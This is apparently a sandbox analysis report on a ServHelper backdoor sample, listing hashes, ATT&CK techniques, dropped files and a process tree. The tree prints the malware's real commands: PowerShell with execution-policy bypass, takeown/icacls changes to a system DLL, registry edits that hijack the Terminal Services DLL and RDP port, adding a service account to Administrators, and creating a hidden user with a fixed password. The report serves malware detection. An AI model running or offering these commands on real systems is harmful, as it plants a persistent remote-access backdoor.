servhelper | 00d5e412b5291821d1d494e993d6df45002cdedb9c750e4133f73ec6a67653ee

Analysis

max time kernel
148s
max time network
164s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
02-05-2022 15:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

00d5e412b5291821d1d494e993d6df45002cdedb9c750e4133f73ec6a67653ee.exe
Size

3.2MB
MD5

92a57e8a84eb3be8af9c64753c30781b
SHA1

bd0717580833a366d3c2b4f8b368095714c4c98d
SHA256

00d5e412b5291821d1d494e993d6df45002cdedb9c750e4133f73ec6a67653ee
SHA512

dd3bcb529dfaab3470c62ee263cef66a3675cd3375d6f8b043b67f2a22564f86d0318c4fc79ad87e0579d2ceff93677745fecdab926141d5687ee3b5cb5753c2

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx

Malware Config

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076

Possible privilege escalation attempt 8 IoCs

exploit

pid	Process
2164	icacls.exe
1556	icacls.exe
1820	icacls.exe
3132	icacls.exe
1732	icacls.exe
3984	icacls.exe
524	takeown.exe
3348	icacls.exe

Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x00070000000231d5-173.dat	upx
behavioral2/files/0x00070000000231d6-174.dat	upx

Loads dropped DLL 2 IoCs

pid	Process
1028	Process not Found
1028	Process not Found

Modifies file permissions 1 TTPs 8 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
3984	icacls.exe
524	takeown.exe
3348	icacls.exe
2164	icacls.exe
1556	icacls.exe
1820	icacls.exe
3132	icacls.exe
1732	icacls.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Windows directory 8 IoCs

description	ioc	Process
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\shellbrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
4320	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
3432	powershell.exe
3432	powershell.exe
2948	powershell.exe
2948	powershell.exe
3008	powershell.exe
3008	powershell.exe
424	powershell.exe
424	powershell.exe
3432	powershell.exe
3432	powershell.exe
3432	powershell.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
644	Process not Found

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	3432	powershell.exe
Token: SeDebugPrivilege	2948	powershell.exe
Token: SeDebugPrivilege	3008	powershell.exe
Token: SeDebugPrivilege	424	powershell.exe
Token: SeRestorePrivilege	2164	icacls.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2604 wrote to memory of 3432	2604	00d5e412b5291821d1d494e993d6df45002cdedb9c750e4133f73ec6a67653ee.exe	81
PID 2604 wrote to memory of 3432	2604	00d5e412b5291821d1d494e993d6df45002cdedb9c750e4133f73ec6a67653ee.exe	81
PID 3432 wrote to memory of 4760	3432	powershell.exe	85
PID 3432 wrote to memory of 4760	3432	powershell.exe	85
PID 4760 wrote to memory of 4600	4760	csc.exe	86
PID 4760 wrote to memory of 4600	4760	csc.exe	86
PID 3432 wrote to memory of 2948	3432	powershell.exe	87
PID 3432 wrote to memory of 2948	3432	powershell.exe	87
PID 3432 wrote to memory of 3008	3432	powershell.exe	89
PID 3432 wrote to memory of 3008	3432	powershell.exe	89
PID 3432 wrote to memory of 424	3432	powershell.exe	91
PID 3432 wrote to memory of 424	3432	powershell.exe	91
PID 3432 wrote to memory of 524	3432	powershell.exe	97
PID 3432 wrote to memory of 524	3432	powershell.exe	97
PID 3432 wrote to memory of 3348	3432	powershell.exe	98
PID 3432 wrote to memory of 3348	3432	powershell.exe	98
PID 3432 wrote to memory of 2164	3432	powershell.exe	99
PID 3432 wrote to memory of 2164	3432	powershell.exe	99
PID 3432 wrote to memory of 1556	3432	powershell.exe	100
PID 3432 wrote to memory of 1556	3432	powershell.exe	100
PID 3432 wrote to memory of 1820	3432	powershell.exe	101
PID 3432 wrote to memory of 1820	3432	powershell.exe	101
PID 3432 wrote to memory of 3132	3432	powershell.exe	102
PID 3432 wrote to memory of 3132	3432	powershell.exe	102
PID 3432 wrote to memory of 1732	3432	powershell.exe	103
PID 3432 wrote to memory of 1732	3432	powershell.exe	103
PID 3432 wrote to memory of 3984	3432	powershell.exe	104
PID 3432 wrote to memory of 3984	3432	powershell.exe	104
PID 3432 wrote to memory of 2172	3432	powershell.exe	105
PID 3432 wrote to memory of 2172	3432	powershell.exe	105
PID 3432 wrote to memory of 4320	3432	powershell.exe	106
PID 3432 wrote to memory of 4320	3432	powershell.exe	106
PID 3432 wrote to memory of 4208	3432	powershell.exe	107
PID 3432 wrote to memory of 4208	3432	powershell.exe	107
PID 3432 wrote to memory of 4840	3432	powershell.exe	110
PID 3432 wrote to memory of 4840	3432	powershell.exe	110
PID 4840 wrote to memory of 3764	4840	net.exe	111
PID 4840 wrote to memory of 3764	4840	net.exe	111
PID 3432 wrote to memory of 588	3432	powershell.exe	112
PID 3432 wrote to memory of 588	3432	powershell.exe	112
PID 588 wrote to memory of 4552	588	cmd.exe	113
PID 588 wrote to memory of 4552	588	cmd.exe	113
PID 4552 wrote to memory of 4872	4552	cmd.exe	114
PID 4552 wrote to memory of 4872	4552	cmd.exe	114
PID 4872 wrote to memory of 2312	4872	net.exe	115
PID 4872 wrote to memory of 2312	4872	net.exe	115
PID 3432 wrote to memory of 3244	3432	powershell.exe	116
PID 3432 wrote to memory of 3244	3432	powershell.exe	116
PID 3244 wrote to memory of 1568	3244	cmd.exe	117
PID 3244 wrote to memory of 1568	3244	cmd.exe	117
PID 1568 wrote to memory of 2280	1568	cmd.exe	118
PID 1568 wrote to memory of 2280	1568	cmd.exe	118
PID 2280 wrote to memory of 5024	2280	net.exe	119
PID 2280 wrote to memory of 5024	2280	net.exe	119
PID 1908 wrote to memory of 2040	1908	cmd.exe	123
PID 1908 wrote to memory of 2040	1908	cmd.exe	123
PID 2040 wrote to memory of 3520	2040	net.exe	124
PID 2040 wrote to memory of 3520	2040	net.exe	124
PID 3432 wrote to memory of 2324	3432	powershell.exe	127
PID 3432 wrote to memory of 2324	3432	powershell.exe	127
PID 3432 wrote to memory of 5080	3432	powershell.exe	128
PID 3432 wrote to memory of 5080	3432	powershell.exe	128
PID 2604 wrote to memory of 3880	2604	cmd.exe	129
PID 2604 wrote to memory of 3880	2604	cmd.exe	129

C:\Users\Admin\AppData\Local\Temp\00d5e412b5291821d1d494e993d6df45002cdedb9c750e4133f73ec6a67653ee.exe
"C:\Users\Admin\AppData\Local\Temp\00d5e412b5291821d1d494e993d6df45002cdedb9c750e4133f73ec6a67653ee.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2604
- \??\c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe
  -ep bypass -noexit -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3432
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tk0lz5qv\tk0lz5qv.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4760
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES499C.tmp" "c:\Users\Admin\AppData\Local\Temp\tk0lz5qv\CSC786B87BE5C0D432DA48B5D2F9281BBDB.TMP"
      4⤵
      PID:4600
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2948
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3008
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:424
- - C:\Windows\system32\takeown.exe
    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:524
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3348
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2164
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1556
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1820
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3132
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1732
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3984
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:2172
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Modifies registry key
    PID:4320
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:4208
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4840
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:3764
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:588
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4552
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4872
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:2312
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3244
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1568
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2280
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:5024
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:2324
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:5080

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:1908
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 000000 /del
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2040
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
    3⤵
    PID:3520

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc ap4XQy78 /add
1⤵
- Suspicious use of WriteProcessMemory
PID:2604
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc ap4XQy78 /add
  2⤵
  PID:3880
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc ap4XQy78 /add
    3⤵
    PID:2000

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Account Manipulation

T1098

Discovery

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
54KB

MD5
5f612d9087b8bcadb4002e6b026990e8

SHA1
b5f343e569abb0849c06e3d77d00cc1bd2d5f589

SHA256
838be164025509d2c4dd005aabf7bbca522b703e931d9c21fb287b5f06178450

SHA512
d5e3e0eeb9b4d3f7ceeba19bc83669258d77d6f973e90049d8cb2796e3f0f6502209e1863ba0a0c7d69b1cc3c0a43e74b9efd0557854ac349f3ffc51d6ea1c59

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES499C.tmp

Filesize
1KB

MD5
99195de0f356a9878ca023dae34fc951

SHA1
a5a250fc1fc323d05a67ebc0bdf74b22f84369ee

SHA256
f89ec4588fab272d85259c4d0e14b7df2237d980d6f3c73beee99f697686e8e5

SHA512
918b616f19cff4c9705bb3033cc0d2c6dbe2634bd53df99a171fd21137126044f2d3f49cc2aa41f5dbbf52e6da8f1fba22ddd854e89b91a612ac18b5c97856df

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-points.ps1

Filesize
3.0MB

MD5
4cbfa161c9ce114d4b772988ef9f8255

SHA1
28178e575804a3c97434bca53111cab82546be38

SHA256
ef297ff9ad64d966e8c977fd8272523f69e73309ed6886b33a8e6e5801e49610

SHA512
d89b9eed47c5396983a7b08999b925d105414f9d7aedbcdfb3a2f081eb7f326838a56221883ce3f68b376172c7339878f3a9b24e601cc002be7887ae91371496

Download Submit
C:\Users\Admin\AppData\Local\Temp\tk0lz5qv\tk0lz5qv.dll

Filesize
3KB

MD5
85d35866a874694ec12c8c2c9761e406

SHA1
6f07e750c70dffd2fdb12430a734f995a8b87217

SHA256
79988b1479715c400679aa33c82e94c58d490e784fffe9e50724ce7c7473437c

SHA512
b7b35aa66541eb2cde268f35d26f636e43a3e63ff909e7ebc32de3da094905868e0d92d6316a099a6bf6a6f5fd894fa8fc0de3e8908a8554d49ee17f274200ce

Download Submit
C:\Windows\Branding\mediasrv.png

Filesize
54KB

MD5
1421ddee54c79131b2374145ebb753c3

SHA1
14542c04f9ae76fbc1d815199a36df294a97b2ef

SHA256
c541a6864196f87b07d9f34622eb2f8571da74909b80df872636bb0b3268f579

SHA512
34d70b20959fe6cca4caa633194cb0e94ac226bce2613bed867ad117707095a67dddf1ea12c63533a44d2bdfbff96f788cf0007b7d90e9b4efc691e925ef93ce

Download Submit
C:\Windows\Branding\mediasvc.png

Filesize
943KB

MD5
ba5050b652ce33ba7bb49c0142d8a47f

SHA1
497000e9e6ba50077b3e5a24a8301428b84cfdc7

SHA256
312d92923a48b780e6719b684f4c472e2d4d966c06d48170162a24f84f5058b0

SHA512
bde68a7bc0c9827fbdc4757b13eca5e79d735fda7f6d0be78a92c7cc819dd2609685abeceacfbf3ef56fc25858e9f476fe6b5961600f5911a97b2116733df1e8

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tk0lz5qv\CSC786B87BE5C0D432DA48B5D2F9281BBDB.TMP

Filesize
652B

MD5
968ec85aea720b79c06c748ae1c1fda7

SHA1
b88140bf5d123bd18aa5ff8f8f54a643c5ee531c

SHA256
8b3cba07e6708905b70e9f504d0d8f024ff9340d1deb3f36e6553032a1b49c72

SHA512
7b4a7c9556e038dc4d063e3e24b0caf69528b491801e95f85c5e69d7fd4548dd4b76d33abdbde4154d01dd141cd24dfb02e002cc04e84c8468d1261066bf648a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tk0lz5qv\tk0lz5qv.0.cs

Filesize
504B

MD5
8e55cb0ca998472ab6d3e295e0c4dd50

SHA1
407d07a29b89fc3afc246c0680d5857e3f51019d

SHA256
63e03eacae29a0d2187103f57a01a5e92ecb3b83a0452e05926303ab57a86685

SHA512
c51982ecdad9a366544cfb68a52808f6a54ed45c1e5b384c0ac5354fe713c18a16c90ee57e0d018caad02f7f293677c62f4c8a9a51bdea143f3afe593172bd28

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tk0lz5qv\tk0lz5qv.cmdline

Filesize
369B

MD5
3163edac47e00e35a8b84980dc30dcf9

SHA1
4473b7af681509e75ba3bd05c121a198ddba1548

SHA256
b1a0f97ad5e1252d81ab8b30b4cec078d02cf7fbb359e285300228d8301a16f0

SHA512
3aac3df56007f2fc719bbb1ed0f46ea49557509bd52a039d3403c56158739232a241c3aac154f3b7bb6bd7d6de58dabf6bdafb71344c6142ccba4fdb262d7f19

Download Submit
memory/424-149-0x00007FF9DE330000-0x00007FF9DEDF1000-memory.dmp

Filesize
10.8MB

Download
memory/2948-147-0x00007FF9DE330000-0x00007FF9DEDF1000-memory.dmp

Filesize
10.8MB

Download
memory/3008-148-0x00007FF9DE330000-0x00007FF9DEDF1000-memory.dmp

Filesize
10.8MB

Download
memory/3432-132-0x000002406F090000-0x000002406F0D4000-memory.dmp

Filesize
272KB

Download
memory/3432-143-0x0000024077A80000-0x0000024077C8A000-memory.dmp

Filesize
2.0MB

Download
memory/3432-133-0x00007FF9DE330000-0x00007FF9DEDF1000-memory.dmp

Filesize
10.8MB

Download
memory/3432-181-0x000002406F920000-0x000002406F996000-memory.dmp

Filesize
472KB

Download
memory/3432-142-0x00000240776F0000-0x0000024077866000-memory.dmp

Filesize
1.5MB

Download
memory/3432-131-0x000002406EEE0000-0x000002406EF02000-memory.dmp

Filesize
136KB

Download